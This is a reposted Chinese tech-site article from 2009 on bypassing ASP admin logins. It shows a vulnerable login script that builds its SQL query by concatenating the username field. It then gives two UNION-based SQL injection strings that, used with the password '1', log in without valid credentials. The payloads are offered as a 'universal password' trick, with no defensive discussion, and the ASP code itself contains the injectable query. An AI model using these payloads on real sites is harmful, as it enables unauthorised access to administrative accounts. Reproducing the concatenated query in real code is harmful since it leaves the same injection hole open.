首页 电脑 电脑学堂 查看内容

ASP注入万能登陆密码

2009-5-20 12:51 835 0

摘要:   原文:http://hi.baidu.com/yanfei6/blog/item/52b6572a4bdcd0305243c114.html   《黑客手册》样刊里面,oldjun提到一种新的万...
关键词: 输入 密码 登陆 代码 程序 用户名 万能 样刊 Select oldjun

  原文:http://hi.baidu.com/yanfei6/blog/item/52b6572a4bdcd0305243c114.html   《黑客手册》样刊里面,oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码:   程序代码   <%   username=trim(Request.Form("username"))   password=trim(Request.Form("password"))   sql="Select * FROM admin Where user='"&username&"'"   Set rs=Server.CreateObject("adodb.recordset")   rs.Open sql,conn,1,1   if rs.eof then   checksysUser=FALSE   else   passwd=trim(rs("pwd"))   if passwd=password then   Session("admin")=username   checksysUser=TRUE   else   checksysUser=FALSE   end if   End if   rs.close   conn.close   if checksysUser=true then   Response.Redirect("main.asp")   else   errmsg="<font color=#FF0000><b>用户名输入有误,请重新输入!</b></font>"   end if   %>   先在数据库中查询用户名对应的密码,然后再和用户输入的密码对比,导致'or'='or'这样的万能登陆密码失效。   但如果在上面的程序中,用户名输入 程序代码   ' UNION Select 1,1,1 FROM admin Where ''='   ,密码输入1,就可以登陆成功,原理很简单,就不多说了。   顺便附上oldjun的语句:   程序代码   ' UNION Select 1,1,1 AS pwd FROM admin Where ''='
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部